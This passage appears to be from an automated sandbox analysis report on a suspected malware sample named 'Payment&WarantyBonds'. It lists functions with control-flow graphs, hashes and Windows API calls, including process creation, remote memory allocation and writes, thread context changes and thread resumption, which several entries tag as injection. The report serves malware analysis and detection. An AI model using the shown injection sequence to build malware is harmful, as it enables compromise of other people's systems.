                                                                                                                                                                                control_flow_graph 839 7ad420-7ad4af GetCurrentProcess 843 7ad4b8-7ad4ec GetCurrentThread 839->843 844 7ad4b1-7ad4b7 839->844 845 7ad4ee-7ad4f4 843->845 846 7ad4f5-7ad529 GetCurrentProcess 843->846 844->843 845->846 848 7ad52b-7ad531 846->848 849 7ad532-7ad54d call 7ad5f8 846->849 848->849 852 7ad553-7ad582 GetCurrentThreadId 849->852 853 7ad58b-7ad5ed 852->853 854 7ad584-7ad58a 852->854 854->853
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 007AD49E
                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 007AD4DB
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 007AD518
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 007AD571
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715216816.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7a0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                • Opcode ID: d63282e96016dec72ade69b2694d84beb732a4cb7844a7e22baa6973c7bc2d7f
                                                                                                                                                                                • Instruction ID: 1fa550b624c83718c3a9aeef0318bdc54decbcd8e910f29d14b5c097f0798c6b
                                                                                                                                                                                • Opcode Fuzzy Hash: d63282e96016dec72ade69b2694d84beb732a4cb7844a7e22baa6973c7bc2d7f
                                                                                                                                                                                • Instruction Fuzzy Hash: 075147B0D00249CFDB14DFA9D588BDEBBF1AF88314F208569E419A73A0D774A984CF65
                                                                                                                                                                                Function 00C03A2D Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1190 c03a2d-c03acd 1193 c03b06-c03b26 1190->1193 1194 c03acf-c03ad9 1190->1194 1201 c03b28-c03b32 1193->1201 1202 c03b5f-c03b8e 1193->1202 1194->1193 1195 c03adb-c03add 1194->1195 1196 c03b00-c03b03 1195->1196 1197 c03adf-c03ae9 1195->1197 1196->1193 1199 c03aeb 1197->1199 1200 c03aed-c03afc 1197->1200 1199->1200 1200->1200 1203 c03afe 1200->1203 1201->1202 1204 c03b34-c03b36 1201->1204 1208 c03b90-c03b9a 1202->1208 1209 c03bc7-c03c81 CreateProcessA 1202->1209 1203->1196 1206 c03b38-c03b42 1204->1206 1207 c03b59-c03b5c 1204->1207 1210 c03b44 1206->1210 1211 c03b46-c03b55 1206->1211 1207->1202 1208->1209 1212 c03b9c-c03b9e 1208->1212 1222 c03c83-c03c89 1209->1222 1223 c03c8a-c03d10 1209->1223 1210->1211 1211->1211 1213 c03b57 1211->1213 1214 c03ba0-c03baa 1212->1214 1215 c03bc1-c03bc4 1212->1215 1213->1207 1217 c03bac 1214->1217 1218 c03bae-c03bbd 1214->1218 1215->1209 1217->1218 1218->1218 1219 c03bbf 1218->1219 1219->1215 1222->1223 1233 c03d20-c03d24 1223->1233 1234 c03d12-c03d16 1223->1234 1236 c03d34-c03d38 1233->1236 1237 c03d26-c03d2a 1233->1237 1234->1233 1235 c03d18 1234->1235 1235->1233 1239 c03d48-c03d4c 1236->1239 1240 c03d3a-c03d3e 1236->1240 1237->1236 1238 c03d2c 1237->1238 1238->1236 1241 c03d5e-c03d65 1239->1241 1242 c03d4e-c03d54 1239->1242 1240->1239 1243 c03d40 1240->1243 1244 c03d67-c03d76 1241->1244 1245 c03d7c 1241->1245 1242->1241 1243->1239 1244->1245 1247 c03d7d 1245->1247 1247->1247
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C03C6E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                • Opcode ID: b2c34338a5d6a700adc378af865f62c767bba20037d7d8e64316477f8f0c661d
                                                                                                                                                                                • Instruction ID: c3ee6517f6197093ab6074c1527778403ba540e189c4b41dafddba441b618106
                                                                                                                                                                                • Opcode Fuzzy Hash: b2c34338a5d6a700adc378af865f62c767bba20037d7d8e64316477f8f0c661d
                                                                                                                                                                                • Instruction Fuzzy Hash: 35A18B70D10259CFDB20DF68C841BEDBBB6FF48314F1481AAE818A7290DB749A85CF91
                                                                                                                                                                                Function 00C03A38 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1248 c03a38-c03acd 1250 c03b06-c03b26 1248->1250 1251 c03acf-c03ad9 1248->1251 1258 c03b28-c03b32 1250->1258 1259 c03b5f-c03b8e 1250->1259 1251->1250 1252 c03adb-c03add 1251->1252 1253 c03b00-c03b03 1252->1253 1254 c03adf-c03ae9 1252->1254 1253->1250 1256 c03aeb 1254->1256 1257 c03aed-c03afc 1254->1257 1256->1257 1257->1257 1260 c03afe 1257->1260 1258->1259 1261 c03b34-c03b36 1258->1261 1265 c03b90-c03b9a 1259->1265 1266 c03bc7-c03c81 CreateProcessA 1259->1266 1260->1253 1263 c03b38-c03b42 1261->1263 1264 c03b59-c03b5c 1261->1264 1267 c03b44 1263->1267 1268 c03b46-c03b55 1263->1268 1264->1259 1265->1266 1269 c03b9c-c03b9e 1265->1269 1279 c03c83-c03c89 1266->1279 1280 c03c8a-c03d10 1266->1280 1267->1268 1268->1268 1270 c03b57 1268->1270 1271 c03ba0-c03baa 1269->1271 1272 c03bc1-c03bc4 1269->1272 1270->1264 1274 c03bac 1271->1274 1275 c03bae-c03bbd 1271->1275 1272->1266 1274->1275 1275->1275 1276 c03bbf 1275->1276 1276->1272 1279->1280 1290 c03d20-c03d24 1280->1290 1291 c03d12-c03d16 1280->1291 1293 c03d34-c03d38 1290->1293 1294 c03d26-c03d2a 1290->1294 1291->1290 1292 c03d18 1291->1292 1292->1290 1296 c03d48-c03d4c 1293->1296 1297 c03d3a-c03d3e 1293->1297 1294->1293 1295 c03d2c 1294->1295 1295->1293 1298 c03d5e-c03d65 1296->1298 1299 c03d4e-c03d54 1296->1299 1297->1296 1300 c03d40 1297->1300 1301 c03d67-c03d76 1298->1301 1302 c03d7c 1298->1302 1299->1298 1300->1296 1301->1302 1304 c03d7d 1302->1304 1304->1304
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C03C6E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                • Opcode ID: e66282b5d7ccffacf4c8ca67d837710a5df80eec01f5b4ceef85b11da35470ad
                                                                                                                                                                                • Instruction ID: 7044d7293409a14979e0878013d601316f9f001b5811c085c1a43e20fae923a4
                                                                                                                                                                                • Opcode Fuzzy Hash: e66282b5d7ccffacf4c8ca67d837710a5df80eec01f5b4ceef85b11da35470ad
                                                                                                                                                                                • Instruction Fuzzy Hash: 53916B71D10259CFDB20DF69C8417EDBBB6FF48314F1481AAE819A7280DB749A85CF91
                                                                                                                                                                                Function 007AAD88 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1305 7aad88-7aad97 1306 7aad99-7aada6 call 7aa100 1305->1306 1307 7aadc3-7aadc7 1305->1307 1314 7aada8 1306->1314 1315 7aadbc 1306->1315 1309 7aaddb-7aae1c 1307->1309 1310 7aadc9-7aadd3 1307->1310 1316 7aae29-7aae37 1309->1316 1317 7aae1e-7aae26 1309->1317 1310->1309 1360 7aadae call 7ab018 1314->1360 1361 7aadae call 7ab020 1314->1361 1315->1307 1318 7aae5b-7aae5d 1316->1318 1319 7aae39-7aae3e 1316->1319 1317->1316 1324 7aae60-7aae67 1318->1324 1321 7aae49 1319->1321 1322 7aae40-7aae47 call 7aa10c 1319->1322 1320 7aadb4-7aadb6 1320->1315 1323 7aaef8-7aafb8 1320->1323 1326 7aae4b-7aae59 1321->1326 1322->1326 1355 7aafba-7aafbd 1323->1355 1356 7aafc0-7aafeb GetModuleHandleW 1323->1356 1327 7aae69-7aae71 1324->1327 1328 7aae74-7aae7b 1324->1328 1326->1324 1327->1328 1329 7aae88-7aae91 call 7aa11c 1328->1329 1330 7aae7d-7aae85 1328->1330 1336 7aae9e-7aaea3 1329->1336 1337 7aae93-7aae9b 1329->1337 1330->1329 1338 7aaec1-7aaece 1336->1338 1339 7aaea5-7aaeac 1336->1339 1337->1336 1345 7aaed0-7aaeee 1338->1345 1346 7aaef1-7aaef7 1338->1346 1339->1338 1341 7aaeae-7aaebe call 7aa12c call 7aa13c 1339->1341 1341->1338 1345->1346 1355->1356 1357 7aafed-7aaff3 1356->1357 1358 7aaff4-7ab008 1356->1358 1357->1358 1360->1320 1361->1320
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 007AAFDE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715216816.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7a0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                • Opcode ID: 8c85870cb1e6396735b520c6864e09b6b066620651b33fc9f670b3d10387ea32
                                                                                                                                                                                • Instruction ID: 976ca237cd5540d2d1b1c3d4750086c38191125f6d42ca109072a2bdca5f7d18
                                                                                                                                                                                • Opcode Fuzzy Hash: 8c85870cb1e6396735b520c6864e09b6b066620651b33fc9f670b3d10387ea32
                                                                                                                                                                                • Instruction Fuzzy Hash: 66714470A00B059FDB24DF29D04575ABBF1FF89304F108A2DE48AD7A50DB78E949CB92
                                                                                                                                                                                Function 007A44E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 007A59C9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715216816.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7a0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                • Opcode ID: 8b1b89edbf6eeec54ce2356b57a15fae519f708ff65855edd738749a0518cbe0
                                                                                                                                                                                • Instruction ID: 4580821ca8187e9577e949556699764fec46b12eb72f1a5f735291b34532ba40
                                                                                                                                                                                • Opcode Fuzzy Hash: 8b1b89edbf6eeec54ce2356b57a15fae519f708ff65855edd738749a0518cbe0
                                                                                                                                                                                • Instruction Fuzzy Hash: D141F1B0D0071DCFDB24CFA9C884B8EBBB5BF89304F20816AD408AB251DB75A945CF90
                                                                                                                                                                                Function 007A5914 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 007A59C9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715216816.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7a0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                • Opcode ID: 470882d081f827564ed5d06548ce147ff62a7fabc1cb649f043c2cc910fc4d6f
                                                                                                                                                                                • Instruction ID: cd51a4f54371aa50e406323152059910fbcce4be5d82a4518ae4a1e057d701d4
                                                                                                                                                                                • Opcode Fuzzy Hash: 470882d081f827564ed5d06548ce147ff62a7fabc1cb649f043c2cc910fc4d6f
                                                                                                                                                                                • Instruction Fuzzy Hash: 7241D3B1D0071DCFDB24CFA9C884B8EBBB5BF89304F24816AD409AB255DB75A945CF90
                                                                                                                                                                                Function 00C037A9 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00C03840
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                • Opcode ID: 71a7c3542b53c3328a5c5542b4dd0e6103bcf72f0c541b9c9be35e9176eb9fb4
                                                                                                                                                                                • Instruction ID: 565589adadd6aca2440bdf3a83855c3fb86a7b4a12c4c0b16d6ad747caed95bc
                                                                                                                                                                                • Opcode Fuzzy Hash: 71a7c3542b53c3328a5c5542b4dd0e6103bcf72f0c541b9c9be35e9176eb9fb4
                                                                                                                                                                                • Instruction Fuzzy Hash: 092128B1900359DFCB10CFA9C845BDEBBF5FF48314F10842AE959A7291C7789A44CBA4
                                                                                                                                                                                Function 00C037B0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00C03840
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                • Opcode ID: e3a01e7a4ed0d696f9b3a970fc2d18a488dd471d536b8aafc54450467dbff61f
                                                                                                                                                                                • Instruction ID: c777a48aaea5210c81956a6f814db4d319ff3c3053f56a1d72421ce80315fc9a
                                                                                                                                                                                • Opcode Fuzzy Hash: e3a01e7a4ed0d696f9b3a970fc2d18a488dd471d536b8aafc54450467dbff61f
                                                                                                                                                                                • Instruction Fuzzy Hash: D6213BB1D003599FCB10CFA9C845BDEBBF5FF48314F10842AE559A7290C7789944CBA4
                                                                                                                                                                                Function 00C03898 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C03920
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                • Opcode ID: 657d9d093402ba8d99fe7ce0bd37b44471f989bc70d46fa34e689d1fcb7afdae
                                                                                                                                                                                • Instruction ID: ece6612d7009c825b8449cd1f0473512ae0ab71d87bffcd29eb86b1a03a7bfcd
                                                                                                                                                                                • Opcode Fuzzy Hash: 657d9d093402ba8d99fe7ce0bd37b44471f989bc70d46fa34e689d1fcb7afdae
                                                                                                                                                                                • Instruction Fuzzy Hash: D12148B18006599FCB10CFA9C881BEEFBF5FF48320F508429E959A7250C7789944CBA5
                                                                                                                                                                                Function 00C03610 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00C03696
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                • Opcode ID: b50ba111b4cbff4d9861f327cda996c1686e08ab6ccde12a94db524a7ee4a3b8
                                                                                                                                                                                • Instruction ID: 7afffa2d4960accb15efc64b036d2d1b7e63647525de2412a1af899fcfcf86a1
                                                                                                                                                                                • Opcode Fuzzy Hash: b50ba111b4cbff4d9861f327cda996c1686e08ab6ccde12a94db524a7ee4a3b8
                                                                                                                                                                                • Instruction Fuzzy Hash: 712148B19002489FDB10DFA9C4457EEBFF4EF48314F54842AD459A7241C7789A85CFA4
                                                                                                                                                                                Function 007AD661 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 007AD6EF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715216816.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7a0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                • Opcode ID: 9fc7227ed143218be4d9e60bab2be1f0cbc9079fd15e1c48a8e25a90f57310f6
                                                                                                                                                                                • Instruction ID: be2967b1d38ac1bf12d5e600c18fc0dc373f2a2c09dcd948b9e809824c9ebb45
                                                                                                                                                                                • Opcode Fuzzy Hash: 9fc7227ed143218be4d9e60bab2be1f0cbc9079fd15e1c48a8e25a90f57310f6
                                                                                                                                                                                • Instruction Fuzzy Hash: F421E4B59012589FDB10CFA9D584ADEBFF4FB48314F14842AE918A7350D378A945CFA1
                                                                                                                                                                                Function 00C038A0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C03920
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                • Opcode ID: 11698cdb377ec908ebc50adbcefb9ed41b41a216f41be3045c0600b3f77521dc
                                                                                                                                                                                • Instruction ID: 425863b360aee6c8a251697697f6c99ff53e94027f4c41d65fcb4f0e149e1df7
                                                                                                                                                                                • Opcode Fuzzy Hash: 11698cdb377ec908ebc50adbcefb9ed41b41a216f41be3045c0600b3f77521dc
                                                                                                                                                                                • Instruction Fuzzy Hash: 822109B1D003599FCB10DFAAC885ADEFBF5FF48320F508429E559A7250C7749944CBA5
                                                                                                                                                                                Function 00C03618 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00C03696
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                • Opcode ID: 7103714876e2c2b54954ce0614d5e3b67a220487c8d03bb830e38da82f28c811
                                                                                                                                                                                • Instruction ID: 7439df29dff4b53dad044381bb111c6c33fcdb8827173ecb8838abfb0f2de505
                                                                                                                                                                                • Opcode Fuzzy Hash: 7103714876e2c2b54954ce0614d5e3b67a220487c8d03bb830e38da82f28c811
                                                                                                                                                                                • Instruction Fuzzy Hash: A6213AB19002499FDB10DFAAC4457EEBBF4FF48314F108429D459A7340C7789A44CFA4
                                                                                                                                                                                Function 007AD668 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 007AD6EF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715216816.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7a0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                • Opcode ID: f4645b245ed2aede12a5f9a93c4553a78018e3f59ba7cad65e4519fd05443b81
                                                                                                                                                                                • Instruction ID: 03a5cbdd8f46a7983d7be6ac59dc4466c8bbcc4405a56b3c3caac6db41dec758
                                                                                                                                                                                • Opcode Fuzzy Hash: f4645b245ed2aede12a5f9a93c4553a78018e3f59ba7cad65e4519fd05443b81
                                                                                                                                                                                • Instruction Fuzzy Hash: 9D21F5B59002489FDB10CF9AD984ADEFFF4FB48310F14801AE918A3350D378A944CFA4
                                                                                                                                                                                Function 00C036E8 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C0375E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                • Opcode ID: da6b4a55cd77e2ef40bbd6406e07dacb04eef51f856d4803c66c3c30ba8d4c45
                                                                                                                                                                                • Instruction ID: 9c45c8a42a9c2a6474d9f3ad68da8fd82bafa7b56ae549a999203eeda5814d76
                                                                                                                                                                                • Opcode Fuzzy Hash: da6b4a55cd77e2ef40bbd6406e07dacb04eef51f856d4803c66c3c30ba8d4c45
                                                                                                                                                                                • Instruction Fuzzy Hash: 811159B5900248DFCB10DFAAC944ADFBFF5EF88324F108419E519A7250C7759644CFA0
                                                                                                                                                                                Function 00C03561 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                • Opcode ID: d19513c4c43b57878d3303bd64296a44d246ad4d711c6cb4d12520c8346b701d
                                                                                                                                                                                • Instruction ID: 82c29a11939a671b283588a7a7dc6a61a1c386561d582edc49a8ecb4666cd837
                                                                                                                                                                                • Opcode Fuzzy Hash: d19513c4c43b57878d3303bd64296a44d246ad4d711c6cb4d12520c8346b701d
                                                                                                                                                                                • Instruction Fuzzy Hash: 391149B19003498FCB20DFAAC8457DEFFF9EF88324F248419D559A7250CB75A944CBA5
                                                                                                                                                                                Function 066D6E8C Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • OutputDebugStringW.KERNELBASE(00000000), ref: 066D7860
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugOutputString
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1166629820-0
                                                                                                                                                                                • Opcode ID: 784d843f4ca17a2fef29fab23f13d476ed3845125a119cd442177a62f0402ab2
                                                                                                                                                                                • Instruction ID: 4dbfee4119d97f241cc31ad10759bcc1d98e209b0fdf83f47193fb87e6c20a3d
                                                                                                                                                                                • Opcode Fuzzy Hash: 784d843f4ca17a2fef29fab23f13d476ed3845125a119cd442177a62f0402ab2
                                                                                                                                                                                • Instruction Fuzzy Hash: DE1112B1D00619ABCB14CF9AD544B9EFBB4FB48324F10812AD819B7340C774A944CFA5
                                                                                                                                                                                Function 00C036F0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C0375E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                • Opcode ID: 18acee20d319f1cf838d18ebfb0d9e6ebca49628e7b52d6648bef84d2ed24257
                                                                                                                                                                                • Instruction ID: 838f37142f190acec1daacbbb7cba79ad2cefa8d7fda743933a85a981736af55
                                                                                                                                                                                • Opcode Fuzzy Hash: 18acee20d319f1cf838d18ebfb0d9e6ebca49628e7b52d6648bef84d2ed24257
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F1137B59002499FCB10DFAAC944BDEFFF5EF88324F108419E559A7250C775A944CFA4
                                                                                                                                                                                Function 066D77E8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
